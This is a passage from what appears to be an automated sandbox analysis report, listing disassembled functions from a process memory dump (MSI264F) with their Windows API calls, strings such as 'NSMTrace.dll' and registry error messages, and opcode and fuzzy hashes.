                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$Library$CloseCurrentDirectoryFreeHandleLoadServicewvsprintf
                                                                                                                        • String ID: Error loading wdfCoInstaller$Error. predeviceInstall failed, e=%d
                                                                                                                        • API String ID: 266337823-2211093675
                                                                                                                        • Opcode ID: 3dd933d6898efa3cb3f48b4d45f3369e4e75cfb1a5f83da5728d40afb7775bb9
                                                                                                                        • Instruction ID: 2a08c90fa6d60071e7cdc921386fad94e8ddecafe61e2e7d2d47369840b07a23
                                                                                                                        • Opcode Fuzzy Hash: 3dd933d6898efa3cb3f48b4d45f3369e4e75cfb1a5f83da5728d40afb7775bb9
                                                                                                                        • Instruction Fuzzy Hash: D821A471B057085BDB14FB769D6AAAF73EC9F84310F10029DF80AD3291EF65EA0086E1
                                                                                                                        Function 00AF33F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF340B
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B614FC
                                                                                                                          • Part of subcall function 00B614E7: __CxxThrowException@8.LIBCMT ref: 00B61511
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B61522
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF3429
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                        • String ID: string too long
                                                                                                                        • API String ID: 963545896-2556327735
                                                                                                                        • Opcode ID: a25ea345bc6af689c6cbb3d1888967d82279ef854d530f109d4ca76c64da8456
                                                                                                                        • Instruction ID: 1a67247f320ecf88c8ccc605342969a3cb02fdac36d1f4e2b3796630544561f0
                                                                                                                        • Opcode Fuzzy Hash: a25ea345bc6af689c6cbb3d1888967d82279ef854d530f109d4ca76c64da8456
                                                                                                                        • Instruction Fuzzy Hash: 5E11A5333046185B5B25EFADE88083AF3EAFFD5722310862FF656C7650DB71990483A4
                                                                                                                        Function 00AF2910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF2927
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B614FC
                                                                                                                          • Part of subcall function 00B614E7: __CxxThrowException@8.LIBCMT ref: 00B61511
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B61522
                                                                                                                        • _memmove.LIBCMT ref: 00AF2971
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                        • String ID: string too long
                                                                                                                        • API String ID: 1785806476-2556327735
                                                                                                                        • Opcode ID: 80fd176c89bc65fadde9f4128bb18391fdda7e02e1c7101880874ee4e028f8a7
                                                                                                                        • Instruction ID: f9fb9f4016125c8c18b3e6f0154972565d3cbb8091123c934ee8f2fc331eff19
                                                                                                                        • Opcode Fuzzy Hash: 80fd176c89bc65fadde9f4128bb18391fdda7e02e1c7101880874ee4e028f8a7
                                                                                                                        • Instruction Fuzzy Hash: BC11B7721143145BD724DEB9E8C1A7BB3E9FF54314B204A2EF587C3541DBB1A8488795
                                                                                                                        Function 00AF2A90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF2AA4
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B614FC
                                                                                                                          • Part of subcall function 00B614E7: __CxxThrowException@8.LIBCMT ref: 00B61511
                                                                                                                          • Part of subcall function 00B614E7: std::exception::exception.LIBCMT ref: 00B61522
                                                                                                                        • _memmove.LIBCMT ref: 00AF2AEB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                        • String ID: string too long
                                                                                                                        • API String ID: 1785806476-2556327735
                                                                                                                        • Opcode ID: 11fc05e0fdd6201219393971765994798bf9eca27ea4f38f930fe22a5d8d84b0
                                                                                                                        • Instruction ID: aec764baf6cef675dd47b300f0c5cc92d4ac89ae4cce55fca64b3fe29d7e897f
                                                                                                                        • Opcode Fuzzy Hash: 11fc05e0fdd6201219393971765994798bf9eca27ea4f38f930fe22a5d8d84b0
                                                                                                                        • Instruction Fuzzy Hash: 1811E9721443185FEB34EEB8A8C1B3AB798AF51314F240A2EF593C3582D771A8448361
                                                                                                                        Function 00B18DB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00B18DD7
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B18E1E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: EnvironmentExpandFileModuleNameStrings
                                                                                                                        • String ID: :
                                                                                                                        • API String ID: 2034136378-336475711
                                                                                                                        • Opcode ID: ce1f655d50cae4201885310c5e6a2427be2412d22cba55cb3294540ea08cf463
                                                                                                                        • Instruction ID: a41c41b6ef660c4477339d68035cd7d484b79dc4922a8b41b4fa4eeea697d100
                                                                                                                        • Opcode Fuzzy Hash: ce1f655d50cae4201885310c5e6a2427be2412d22cba55cb3294540ea08cf463
                                                                                                                        • Instruction Fuzzy Hash: 792198759003189ACF24EB64CC56BEA73B8FF44700F9081D9E60997292EF745BC5CBA5
                                                                                                                        Function 00AE2260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00AE22A8
                                                                                                                          • Part of subcall function 00AE20B0: __alloca_probe_16.LIBCMT ref: 00AE20E8
                                                                                                                          • Part of subcall function 00AE20B0: WideCharToMultiByte.KERNEL32(?,00000000,?,?,?,?,00000000,00000000), ref: 00AE2117
                                                                                                                          • Part of subcall function 00AE20B0: _fputs.LIBCMT ref: 00AE2122
                                                                                                                          • Part of subcall function 00AE20B0: _fputc.LIBCMT ref: 00AE212A
                                                                                                                          • Part of subcall function 00AE2010: _memset.LIBCMT ref: 00AE2036
                                                                                                                          • Part of subcall function 00AE2010: _wcsncpy.LIBCMT ref: 00AE205E
                                                                                                                          • Part of subcall function 00AE2010: wsprintfW.USER32 ref: 00AE2082
                                                                                                                        • wsprintfW.USER32 ref: 00AE2302
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memsetwsprintf$ByteCharMultiWide__alloca_probe_16_fputc_fputs_wcsncpy
                                                                                                                        • String ID: _present=1%c
                                                                                                                        • API String ID: 3184803792-4044182117
                                                                                                                        • Opcode ID: 1c6087753afeaca580dc8a2f3cf85ab6f5b59d54e91cd9996d8e83137bb25d4b
                                                                                                                        • Instruction ID: 391c52368a7bf3fdf40ad030f35e6eb7f52c72a2cad626b49f2d5c7238d0b7f9
                                                                                                                        • Opcode Fuzzy Hash: 1c6087753afeaca580dc8a2f3cf85ab6f5b59d54e91cd9996d8e83137bb25d4b
                                                                                                                        • Instruction Fuzzy Hash: 8B210E75900218ABCB24DF95CD81BDAB7B9AF48700F1045D9B50997581EBB4AF84CFA1
                                                                                                                        Function 00B22D30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp
                                                                                                                        • String ID: .EXE$.exe
                                                                                                                        • API String ID: 1038674560-1650885426
                                                                                                                        • Opcode ID: 2324025b597084d5bfc56bffc4d71aa34cc655f835e3a8a41c09b0b0c82d740f
                                                                                                                        • Instruction ID: 7dbba89ded66ac5b213019ab78766c88b978a4dec7301410f65ad99536753f14
                                                                                                                        • Opcode Fuzzy Hash: 2324025b597084d5bfc56bffc4d71aa34cc655f835e3a8a41c09b0b0c82d740f
                                                                                                                        • Instruction Fuzzy Hash: 6811A722E0023172DB352F186C46AB7B2E8DE60390B5884F9FD8DD71D6F7A59C9182E1
                                                                                                                        Function 00B12240 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcsncpy
                                                                                                                        • String ID: ..\CTL32\util.cpp$p || !"<2Kb mem"
                                                                                                                        • API String ID: 1735881322-1364758145
                                                                                                                        • Opcode ID: 0a0015f54b275e129313b42aacb1d7e105a3ed68481d5cffbb0bcb8c97158918
                                                                                                                        • Instruction ID: d8d127174c72510b44a2db47dd4bbb592bd674949db9ad4271e7b738bcfa3109
                                                                                                                        • Opcode Fuzzy Hash: 0a0015f54b275e129313b42aacb1d7e105a3ed68481d5cffbb0bcb8c97158918
                                                                                                                        • Instruction Fuzzy Hash: 9F0124337042002BDB201A9DAC82AEB77C8DBC1760F0882B5FA0CDB251E525ED5486E1
                                                                                                                        Function 00B04A40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.ADVAPI32(00020019,?,00000000,5E06C67B,00000000,00020019,?,00000000), ref: 00B04A70
                                                                                                                          • Part of subcall function 00B04640: wvsprintfW.USER32(?,?,?), ref: 00B0466B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: QueryValuewvsprintf
                                                                                                                        • String ID: ($Error %d getting %s
                                                                                                                        • API String ID: 141982866-3697087921
                                                                                                                        • Opcode ID: 4ce7d8a84ce89665e8a4f0b2651c606f155c646513af397fc98fed68a0d5f84b
                                                                                                                        • Instruction ID: a94890803d0e12f8f5bb65e60a5b3579e7acc6d22473dd379a431166200c9714
                                                                                                                        • Opcode Fuzzy Hash: 4ce7d8a84ce89665e8a4f0b2651c606f155c646513af397fc98fed68a0d5f84b
                                                                                                                        • Instruction Fuzzy Hash: D81177B2E01108ABDB10DEA8DD45DAFB7F8EB94710F14855AF906A7290DE70A90487A1
                                                                                                                        Function 00AF12B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00AF12C6
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B61549
                                                                                                                          • Part of subcall function 00B61534: __CxxThrowException@8.LIBCMT ref: 00B6155E
                                                                                                                          • Part of subcall function 00B61534: std::exception::exception.LIBCMT ref: 00B6156F
                                                                                                                        • _memmove.LIBCMT ref: 00AF1304
                                                                                                                        Strings
                                                                                                                        • invalid string position, xrefs: 00AF12C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                        • String ID: invalid string position
                                                                                                                        • API String ID: 1785806476-1799206989
                                                                                                                        • Opcode ID: 8ddad93778d562de32f6ff0431e9ee02b2e2042bbee28ff33251833ca0f9484d
                                                                                                                        • Instruction ID: 89b12f864b1c1f172bc1d87670af2bdffa4fa6182a19d2d8d29acebdf0ce8337
                                                                                                                        • Opcode Fuzzy Hash: 8ddad93778d562de32f6ff0431e9ee02b2e2042bbee28ff33251833ca0f9484d
                                                                                                                        • Instruction Fuzzy Hash: 4F1173323006189B8724DEEDD9808AAF3FABFD4750324493EE286CB615DA71D856C794
                                                                                                                        Function 00B1C750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59libraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00B1C78A
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00B1C7C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileLibraryLoadModuleName
                                                                                                                        • String ID: NSMTrace.dll
                                                                                                                        • API String ID: 1159719554-2572706706
                                                                                                                        • Opcode ID: eb631b431db68894a67b250bd8487c9fb9b8930c2dd0ff7b8e993096e874dd20
                                                                                                                        • Instruction ID: 581cc966c70bb34b9c8380694b694626aa7a7acbe162b465a5ea1b0f14c52bd8
                                                                                                                        • Opcode Fuzzy Hash: eb631b431db68894a67b250bd8487c9fb9b8930c2dd0ff7b8e993096e874dd20
                                                                                                                        • Instruction Fuzzy Hash: 5B11E3B5A403059BCB10DFA8DC94DBA7BF8EB44300F5040A9E909D7291EF749D40CBB1
                                                                                                                        Function 00B04ED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __itow.LIBCMT ref: 00B04EF2
                                                                                                                          • Part of subcall function 00B3A0C7: _xtow@16.LIBCMT ref: 00B3A0E7
                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?,?), ref: 00B04F20
                                                                                                                        Strings
                                                                                                                        • Error %d setting %s to %s, xrefs: 00B04F32
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Value__itow_xtow@16
                                                                                                                        • String ID: Error %d setting %s to %s
                                                                                                                        • API String ID: 1693617490-505477165
                                                                                                                        • Opcode ID: 7db53bbe01890d1a8764fda069df6f0dd003ecc23429ec7f6f5b9ec7d39ab5fb
                                                                                                                        • Instruction ID: aa79edddae23d4eea7ef65bb13ab900a010ea3b13e97f4eadb4dc11b9237e202
                                                                                                                        • Opcode Fuzzy Hash: 7db53bbe01890d1a8764fda069df6f0dd003ecc23429ec7f6f5b9ec7d39ab5fb
                                                                                                                        • Instruction Fuzzy Hash: 8701A5B56002086BC714DB94DC85EAFB7BCEB84700F504599FA059B281EAB0EE04C7D1
                                                                                                                        Function 00AE2CE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00AE2D25
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,-00000001,00B699F4,?), ref: 00AE2D45
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__alloca_probe_16
                                                                                                                        • String ID: [%s]%s=%s
                                                                                                                        • API String ID: 3688305362-3085917964
                                                                                                                        • Opcode ID: 1997bd6385ada8ab189f591a8e80ad0d8f20ce41001e6247de770c6af12792fc
                                                                                                                        • Instruction ID: 6e6efea0f78a2856a782cf5bc8d1057c8344f496764ffb9cc923ae7f5cc71900
                                                                                                                        • Opcode Fuzzy Hash: 1997bd6385ada8ab189f591a8e80ad0d8f20ce41001e6247de770c6af12792fc
                                                                                                                        • Instruction Fuzzy Hash: CE118275600108AFDB10EF98DC56FEF77B8EB85710F104298FD1597391EAB4AA05CB92
                                                                                                                        Function 00AFE4C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 00AFE4E5
                                                                                                                        • RegSetValueExW.ADVAPI32(?,?,00000000,00000004,?,00000004), ref: 00AFE511
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$Query
                                                                                                                        • String ID: %s=%x, e=%d
                                                                                                                        • API String ID: 4255345937-60135172
                                                                                                                        • Opcode ID: 7adaed93989ff42bd5fe30242110254dc4d08068507c5e431611bd7978a95f91
                                                                                                                        • Instruction ID: 8496b060de865afa2a3d8b607e424f9a31f6375e40923b63fc471581faf4556f
                                                                                                                        • Opcode Fuzzy Hash: 7adaed93989ff42bd5fe30242110254dc4d08068507c5e431611bd7978a95f91
                                                                                                                        • Instruction Fuzzy Hash: 68015272A11219BBDB20DF95DC09FEB77BCEB85B14F004196FA1497140E6B0AA1587A1
                                                                                                                        Function 00AF29D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
